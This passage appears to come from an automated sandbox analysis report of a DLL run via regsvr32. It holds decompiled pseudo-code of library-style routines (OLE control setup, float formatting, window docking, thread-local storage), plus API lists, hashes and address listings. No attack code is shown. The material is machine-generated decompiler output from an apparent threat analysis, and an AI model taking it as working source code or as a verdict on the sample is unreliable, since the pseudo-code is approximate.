                                                                        						 *(_t239 - 0x28) = _t138;
                                                                        					}
                                                                        					_t183 = 0;
                                                                        				}
                                                                        				 *(_t239 - 0x2c) = _t183;
                                                                        				_t139 = E100243B2();
                                                                        				_t218 =  *_t139;
                                                                        				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
                                                                        				 *(_t239 - 4) = _t183;
                                                                        				 *(_t239 - 0x38) = _t183;
                                                                        				 *(_t239 - 0x3c) = _t183;
                                                                        				 *(_t239 - 0x30) = _t183;
                                                                        				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
                                                                        					_t142 =  *_t229;
                                                                        					_t49 = _t142 - 0xc; // -28
                                                                        					_t191 = _t49;
                                                                        					_t229 =  &(_t229[3]);
                                                                        					 *(_t239 - 0x40) = _t142;
                                                                        					 *(_t239 + 0x1c) = _t191;
                                                                        					if(_t191 > _t183) {
                                                                        						do {
                                                                        							_t171 =  *_t229;
                                                                        							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
                                                                        							_t235 =  &(_t229[1]);
                                                                        							_t229 =  &(_t235[0]);
                                                                        							 *(_t239 - 0x44) = _t171;
                                                                        							 *(_t239 + 0x10) =  *_t235;
                                                                        							if(_t171 != 0x80010001) {
                                                                        								_t172 = E1001F77E(0x1c);
                                                                        								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
                                                                        								__eflags = _t172 - _t183;
                                                                        								 *(_t239 - 4) = 1;
                                                                        								if(_t172 == _t183) {
                                                                        									_t173 = 0;
                                                                        									__eflags = 0;
                                                                        								} else {
                                                                        									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
                                                                        								}
                                                                        								 *(_t239 - 4) = 0;
                                                                        								 *(_t239 - 0x2c) = _t173;
                                                                        							} else {
                                                                        								_t237 =  &(_t229[1]);
                                                                        								 *(_t239 - 0x3c) =  *_t229;
                                                                        								_t238 =  &(_t237[3]);
                                                                        								 *(_t239 - 0x30) =  *_t237;
                                                                        								E10006AEC(_t239 + 0x14, _t238);
                                                                        								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
                                                                        								_t213 = 0xffffffef;
                                                                        								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
                                                                        								_t229 = _t238 + _t178 + 1;
                                                                        								 *(_t239 - 0x38) =  *(_t239 + 0x10);
                                                                        							}
                                                                        						} while ( *(_t239 + 0x1c) > _t183);
                                                                        						_t142 =  *(_t239 - 0x40);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
                                                                        					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
                                                                        				}
                                                                        				_t143 =  *(_t239 - 0x34);
                                                                        				_t256 =  *_t143 - 0x7b;
                                                                        				_push(_t239 - 0x20);
                                                                        				_push(_t143);
                                                                        				if( *_t143 != 0x7b) {
                                                                        					__imp__CLSIDFromProgID();
                                                                        				} else {
                                                                        					__imp__CLSIDFromString();
                                                                        				}
                                                                        				_push(_t183);
                                                                        				_push( *((intOrPtr*)(_t239 + 0x20)));
                                                                        				_push(_t229);
                                                                        				 *(_t239 + 0x1c) = _t143;
                                                                        				E1002EC6C(_t239 - 0x94, _t256);
                                                                        				 *(_t239 - 4) = 2;
                                                                        				 *(_t239 - 0x24) = _t183;
                                                                        				asm("sbb esi, esi");
                                                                        				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
                                                                        				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
                                                                        					E1000A762( *(_t239 - 0x24), 1);
                                                                        					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
                                                                        					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
                                                                        					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
                                                                        					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
                                                                        					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
                                                                        					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
                                                                        				}
                                                                        				if( *(_t239 - 0x28) != _t183) {
                                                                        					__imp__#6( *(_t239 - 0x28));
                                                                        				}
                                                                        				_t146 =  *(_t239 - 0x24);
                                                                        				if(_t146 == _t183) {
                                                                        					 *( *(_t239 + 0x24)) = _t183;
                                                                        				} else {
                                                                        					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
                                                                        					_t183 = 1;
                                                                        				}
                                                                        				 *(_t239 - 4) = 0;
                                                                        				E1002EFD7(_t183, _t239 - 0x94, _t218);
                                                                        				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
                                                                        				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
                                                                        			}































                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100074F7
                                                                        • MapDialogRect.USER32(?,?), ref: 10007585
                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                        • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                        • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                        • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                        • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                        • String ID:
                                                                        • API String ID: 493809305-0
                                                                        • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                        • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
                                                                        				intOrPtr _v8;
                                                                        				char _v9;
                                                                        				signed int _v10;
                                                                        				signed int _v14;
                                                                        				signed int _v18;
                                                                        				signed short _v20;
                                                                        				char _v21;
                                                                        				char _v22;
                                                                        				char _v23;
                                                                        				char _v24;
                                                                        				char _v25;
                                                                        				char _v26;
                                                                        				char _v27;
                                                                        				char _v28;
                                                                        				char _v29;
                                                                        				char _v30;
                                                                        				char _v31;
                                                                        				char _v32;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				signed short* _v52;
                                                                        				intOrPtr _t87;
                                                                        				signed int _t88;
                                                                        				signed short* _t99;
                                                                        				intOrPtr* _t100;
                                                                        				signed int _t101;
                                                                        				signed short _t103;
                                                                        				signed int _t105;
                                                                        				signed short* _t131;
                                                                        				signed int _t133;
                                                                        				signed int _t139;
                                                                        				signed short* _t141;
                                                                        				signed short _t149;
                                                                        				signed int _t151;
                                                                        				signed int _t152;
                                                                        				signed int _t159;
                                                                        				signed int _t161;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        				void* _t166;
                                                                        
                                                                        				_t87 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t87;
                                                                        				_t88 = _a12;
                                                                        				_t131 = _a24;
                                                                        				_t133 = _t88 & 0x00008000;
                                                                        				_v32 = 0xcc;
                                                                        				_v31 = 0xcc;
                                                                        				_v30 = 0xcc;
                                                                        				_v29 = 0xcc;
                                                                        				_v28 = 0xcc;
                                                                        				_v27 = 0xcc;
                                                                        				_v26 = 0xcc;
                                                                        				_v25 = 0xcc;
                                                                        				_v24 = 0xcc;
                                                                        				_v23 = 0xcc;
                                                                        				_v22 = 0xfb;
                                                                        				_v21 = 0x3f;
                                                                        				_v48 = 1;
                                                                        				_t149 = _t88 & 0x00007fff;
                                                                        				if(_t133 == 0) {
                                                                        					_t131[1] = 0x20;
                                                                        				} else {
                                                                        					_t131[1] = 0x2d;
                                                                        				}
                                                                        				_t151 = _a8;
                                                                        				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
                                                                        					if(_t149 != 0x7fff) {
                                                                        						_t90 = _t149 & 0x0000ffff;
                                                                        						_v20 = _v20 & 0x00000000;
                                                                        						_v18 = _a4;
                                                                        						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
                                                                        						_v10 = _t149;
                                                                        						_v14 = _t151;
                                                                        						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
                                                                        						_t166 = _t165 + 0xc;
                                                                        						__eflags = _v10 - 0x3fff;
                                                                        						if(_v10 >= 0x3fff) {
                                                                        							_t159 = _t159 + 1;
                                                                        							__eflags = _t159;
                                                                        							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
                                                                        						}
                                                                        						__eflags = _a20 & 0x00000001;
                                                                        						_t152 = _a16;
                                                                        						 *_t131 = _t159;
                                                                        						if((_a20 & 0x00000001) == 0) {
                                                                        							L27:
                                                                        							__eflags = _t152 - 0x15;
                                                                        							if(_t152 > 0x15) {
                                                                        								_t152 = 0x15;
                                                                        							}
                                                                        							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
                                                                        							_t52 =  &_v10;
                                                                        							 *_t52 = _v10 & 0x00000000;
                                                                        							__eflags =  *_t52;
                                                                        							_a12 = 8;
                                                                        							do {
                                                                        								E1001B6CD( &_v20);
                                                                        								_t56 =  &_a12;
                                                                        								 *_t56 = _a12 - 1;
                                                                        								__eflags =  *_t56;
                                                                        							} while ( *_t56 != 0);
                                                                        							__eflags = _t161;
                                                                        							if(_t161 < 0) {
                                                                        								_t164 =  ~_t161 & 0x000000ff;
                                                                        								__eflags = _t164;
                                                                        								if(_t164 > 0) {
                                                                        									do {
                                                                        										E1001B6FB( &_v20);
                                                                        										_t164 = _t164 - 1;
                                                                        										__eflags = _t164;
                                                                        									} while (_t164 != 0);
                                                                        								}
                                                                        							}
                                                                        							_t59 = _t152 + 1; // 0xcd
                                                                        							_t139 = _t59;
                                                                        							__eflags = _t139;
                                                                        							_t99 =  &(_t131[2]);
                                                                        							_v52 = _t99;
                                                                        							if(_t139 > 0) {
                                                                        								_a12 = _t139;
                                                                        								do {
                                                                        									asm("movsd");
                                                                        									asm("movsd");
                                                                        									asm("movsd");
                                                                        									E1001B6CD( &_v20);
                                                                        									E1001B6CD( &_v20);
                                                                        									E1001B66F(__eflags,  &_v20,  &_v44);
                                                                        									E1001B6CD( &_v20);
                                                                        									_t166 = _t166 + 0x14;
                                                                        									_v52 =  &(_v52[0]);
                                                                        									_t74 =  &_a12;
                                                                        									 *_t74 = _a12 - 1;
                                                                        									__eflags =  *_t74;
                                                                        									 *_v52 = _v9 + 0x30;
                                                                        									_v9 = 0;
                                                                        								} while ( *_t74 != 0);
                                                                        								_t99 = _v52;
                                                                        							}
                                                                        							_t100 = _t99 - 1;
                                                                        							_t101 = _t100 - 1;
                                                                        							__eflags =  *_t100 - 0x35;
                                                                        							_t141 =  &(_t131[2]);
                                                                        							if( *_t100 < 0x35) {
                                                                        								while(1) {
                                                                        									__eflags = _t101 - _t141;
                                                                        									if(_t101 < _t141) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags =  *_t101 - 0x30;
                                                                        									if( *_t101 == 0x30) {
                                                                        										_t101 = _t101 - 1;
                                                                        										__eflags = _t101;
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _t101 - _t141;
                                                                        								if(_t101 >= _t141) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									 *_t141 = 0x30;
                                                                        									goto L54;
                                                                        								}
                                                                        							} else {
                                                                        								while(1) {
                                                                        									__eflags = _t101 - _t141;
                                                                        									if(_t101 < _t141) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags =  *_t101 - 0x39;
                                                                        									if( *_t101 == 0x39) {
                                                                        										 *_t101 = 0x30;
                                                                        										_t101 = _t101 - 1;
                                                                        										__eflags = _t101;
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _t101 - _t141;
                                                                        								if(_t101 < _t141) {
                                                                        									_t101 = _t101 + 1;
                                                                        									 *_t131 =  *_t131 + 1;
                                                                        									__eflags =  *_t131;
                                                                        								}
                                                                        								 *_t101 =  *_t101 + 1;
                                                                        								__eflags =  *_t101;
                                                                        								L46:
                                                                        								_t103 = _t101 - _t131 - 3;
                                                                        								__eflags = _t103;
                                                                        								_t131[1] = _t103;
                                                                        								 *((char*)( &(_t131[2]) + _t103)) = 0;
                                                                        								goto L47;
                                                                        							}
                                                                        						} else {
                                                                        							_t152 = _t152 + _t159;
                                                                        							__eflags = _t152;
                                                                        							if(_t152 > 0) {
                                                                        								goto L27;
                                                                        							} else {
                                                                        								goto L26;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						 *_t131 = 1;
                                                                        						if(_t151 != 0x80000000 || _a4 != 0) {
                                                                        							if((_t151 & 0x40000000) != 0) {
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_push("1#SNAN");
                                                                        								goto L21;
                                                                        							}
                                                                        						} else {
                                                                        							L11:
                                                                        							__eflags = _t133;
                                                                        							if(_t133 == 0) {
                                                                        								L15:
                                                                        								__eflags = _t151 - 0x80000000;
                                                                        								if(_t151 != 0x80000000) {
                                                                        									goto L20;
                                                                        								} else {
                                                                        									__eflags = _a4;
                                                                        									if(_a4 != 0) {
                                                                        										goto L20;
                                                                        									} else {
                                                                        										_push("1#INF");
                                                                        										goto L18;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t151 - 0xc0000000;
                                                                        								if(_t151 != 0xc0000000) {
                                                                        									goto L15;
                                                                        								} else {
                                                                        									__eflags = _a4;
                                                                        									if(_a4 != 0) {
                                                                        										L20:
                                                                        										_push("1#QNAN");
                                                                        										L21:
                                                                        										_push( &(_t131[2]));
                                                                        										E10017B90();
                                                                        										_t131[1] = 6;
                                                                        									} else {
                                                                        										_push("1#IND");
                                                                        										L18:
                                                                        										_push( &(_t131[2]));
                                                                        										E10017B90();
                                                                        										_t131[1] = 5;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_v48 = _v48 & 0x00000000;
                                                                        						L47:
                                                                        						_t105 = _v48;
                                                                        					}
                                                                        				} else {
                                                                        					L26:
                                                                        					_t131[2] = 0x30;
                                                                        					L54:
                                                                        					 *_t131 =  *_t131 & 0x00000000;
                                                                        					_t131[1] = 0x20;
                                                                        					_t131[1] = 1;
                                                                        					_t131[2] = 0;
                                                                        					_t105 = 1;
                                                                        				}
                                                                        				return E100117AE(_t105, _v8);
                                                                        			}











































                                                                        0x1001be27
                                                                        0x1001be34
                                                                        0x1001be3d
                                                                        0x1001be4a
                                                                        0x1001be4d
                                                                        0x1001be50
                                                                        0x1001be50
                                                                        0x1001be50
                                                                        0x1001be53
                                                                        0x1001be55
                                                                        0x1001be55
                                                                        0x1001be5b
                                                                        0x1001be5b
                                                                        0x1001be5e
                                                                        0x1001be61
                                                                        0x1001be62
                                                                        0x1001be65
                                                                        0x1001be68
                                                                        0x1001bea8
                                                                        0x1001bea8
                                                                        0x1001beaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001bea2
                                                                        0x1001bea5
                                                                        0x1001bea7
                                                                        0x1001bea7
                                                                        0x00000000
                                                                        0x1001bea7
                                                                        0x00000000
                                                                        0x1001bea5
                                                                        0x1001beac
                                                                        0x1001beae
                                                                        0x00000000
                                                                        0x1001beb0
                                                                        0x1001beb0
                                                                        0x00000000
                                                                        0x1001beb0
                                                                        0x1001be6a
                                                                        0x1001be75
                                                                        0x1001be75
                                                                        0x1001be77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001be6c
                                                                        0x1001be6f
                                                                        0x1001be71
                                                                        0x1001be74
                                                                        0x1001be74
                                                                        0x00000000
                                                                        0x1001be74
                                                                        0x00000000
                                                                        0x1001be6f
                                                                        0x1001be79
                                                                        0x1001be7b
                                                                        0x1001be7d
                                                                        0x1001be7e
                                                                        0x1001be7e
                                                                        0x1001be7e
                                                                        0x1001be81
                                                                        0x1001be81
                                                                        0x1001be83
                                                                        0x1001be85
                                                                        0x1001be85
                                                                        0x1001be87
                                                                        0x1001be8d
                                                                        0x00000000
                                                                        0x1001be8d
                                                                        0x1001bda7
                                                                        0x1001bdaa
                                                                        0x1001bdac
                                                                        0x1001bdae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001bdae
                                                                        0x1001bcc2
                                                                        0x1001bcc9
                                                                        0x1001bcce
                                                                        0x1001bcdc
                                                                        0x00000000
                                                                        0x1001bcde
                                                                        0x1001bcde
                                                                        0x00000000
                                                                        0x1001bcde
                                                                        0x1001bce5
                                                                        0x1001bce5
                                                                        0x1001bce5
                                                                        0x1001bce8
                                                                        0x1001bcff
                                                                        0x1001bcff
                                                                        0x1001bd01
                                                                        0x00000000
                                                                        0x1001bd03
                                                                        0x1001bd03
                                                                        0x1001bd07
                                                                        0x00000000
                                                                        0x1001bd09
                                                                        0x1001bd09
                                                                        0x00000000
                                                                        0x1001bd09
                                                                        0x1001bd07
                                                                        0x1001bcea
                                                                        0x1001bcea
                                                                        0x1001bcf0
                                                                        0x00000000
                                                                        0x1001bcf2
                                                                        0x1001bcf2
                                                                        0x1001bcf6
                                                                        0x1001bd26
                                                                        0x1001bd26
                                                                        0x1001bd2b
                                                                        0x1001bd2e
                                                                        0x1001bd2f
                                                                        0x1001bd34
                                                                        0x1001bcf8
                                                                        0x1001bcf8
                                                                        0x1001bd0e
                                                                        0x1001bd11
                                                                        0x1001bd12
                                                                        0x1001bd17
                                                                        0x1001bd17
                                                                        0x1001bcf6
                                                                        0x1001bcf0
                                                                        0x1001bce8
                                                                        0x1001bd1b
                                                                        0x1001be92
                                                                        0x1001be92
                                                                        0x1001be92
                                                                        0x1001bdb0
                                                                        0x1001bdb0
                                                                        0x1001bdb0
                                                                        0x1001beb3
                                                                        0x1001beb3
                                                                        0x1001beb9
                                                                        0x1001bebd
                                                                        0x1001bec1
                                                                        0x1001bec5
                                                                        0x1001bec5
                                                                        0x1001bea1

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ___shr_12
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                        • API String ID: 2664560246-4131533671
                                                                        • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                        • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E1002DA8D(intOrPtr __ecx, void* __edx) {
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t60;
                                                                        				signed char _t65;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        				intOrPtr _t109;
                                                                        				signed int _t115;
                                                                        				signed int _t117;
                                                                        				void* _t133;
                                                                        				void* _t135;
                                                                        				intOrPtr _t140;
                                                                        				void* _t143;
                                                                        				void* _t145;
                                                                        
                                                                        				_t133 = __edx;
                                                                        				_t143 = _t145 - 0xa8;
                                                                        				_t60 =  *0x1004c470; // 0x303bb91f
                                                                        				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                        				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
                                                                        				_t109 = __ecx;
                                                                        				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
                                                                        				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
                                                                        					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
                                                                        						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
                                                                        					}
                                                                        					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
                                                                        					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
                                                                        					 *(_t109 + 0x7c) = _t65;
                                                                        					if((_t65 & 0x00000040) == 0) {
                                                                        						_push(0x104);
                                                                        						_push(_t143 - 0x60);
                                                                        						E1002095F(_t140);
                                                                        						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
                                                                        					}
                                                                        					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
                                                                        					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
                                                                        						_t71 = _t70 & 0xfffffffe;
                                                                        					} else {
                                                                        						_t71 = _t70 | 0x00000001;
                                                                        					}
                                                                        					E100383D0(_t140, _t71);
                                                                        					_push(0xffffffff);
                                                                        					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
                                                                        					if(_t135 > 0) {
                                                                        						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
                                                                        					}
                                                                        					if( *(_t143 + 0xb4) == 0) {
                                                                        						if(_t135 < 1) {
                                                                        							_t137 = _t109 + 0x94;
                                                                        							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
                                                                        							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
                                                                        						}
                                                                        						_t115 =  *0x1004efa4; // 0x2
                                                                        						_push(0x115);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push( ~_t115);
                                                                        						_t117 =  *0x1004efa0; // 0x2
                                                                        						_push( ~_t117);
                                                                        						_push(0);
                                                                        					} else {
                                                                        						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
                                                                        						E10028E5A(_t109, _t143 - 0x70);
                                                                        						if(_t135 < 1) {
                                                                        							asm("cdq");
                                                                        							asm("cdq");
                                                                        							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
                                                                        							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
                                                                        							_push( *((intOrPtr*)(_t143 + 0xb0)));
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							E1002CE2A(_t109);
                                                                        							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                        						}
                                                                        						_push(0x114);
                                                                        						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
                                                                        						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
                                                                        						_push( *((intOrPtr*)(_t143 - 0x6c)));
                                                                        						_push( *(_t143 - 0x70));
                                                                        						_push(0);
                                                                        					}
                                                                        					E100204FE(_t140);
                                                                        					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
                                                                        						E1000870E(_t140, _t109);
                                                                        					}
                                                                        					_t120 =  *((intOrPtr*)(_t140 + 0x88));
                                                                        					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
                                                                        						E1002D1B2(_t120, _t140, 0xffffffff, 0);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
                                                                        					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
                                                                        				}
                                                                        				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
                                                                        			}


















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$CopyCtrlEqualParentWindow
                                                                        • String ID: @
                                                                        • API String ID: 2544134605-2766056989
                                                                        • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                        • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
                                                                        				struct _CRITICAL_SECTION* _v8;
                                                                        				void* __ebp;
                                                                        				void* _t32;
                                                                        				void* _t36;
                                                                        				void* _t37;
                                                                        				signed int _t52;
                                                                        				long* _t59;
                                                                        				struct _CRITICAL_SECTION* _t62;
                                                                        				void* _t64;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t59 = __ecx;
                                                                        				_t1 =  &(_t59[7]); // 0x1004f010
                                                                        				_t62 = _t1;
                                                                        				_v8 = _t62;
                                                                        				EnterCriticalSection(_t62);
                                                                        				_t32 = _a4;
                                                                        				if(_t32 <= 0) {
                                                                        					L20:
                                                                        					LeaveCriticalSection(_t62);
                                                                        				} else {
                                                                        					_t4 =  &(_t59[3]); // 0x3
                                                                        					if(_t32 >=  *_t4) {
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t64 = TlsGetValue( *_t59);
                                                                        						if(_t64 == 0) {
                                                                        							if(E1003741E(0x10) == 0) {
                                                                        								_t64 = 0;
                                                                        							} else {
                                                                        								_t64 = E10037684(_t34);
                                                                        							}
                                                                        							 *(_t64 + 8) = 0;
                                                                        							 *(_t64 + 0xc) = 0;
                                                                        							_t10 =  &(_t59[5]); // 0x2f10950
                                                                        							_t49 =  *_t10;
                                                                        							_t11 =  &(_t59[6]); // 0x4
                                                                        							 *(_t64 +  *_t11) =  *_t10;
                                                                        							_t59[5] = _t64;
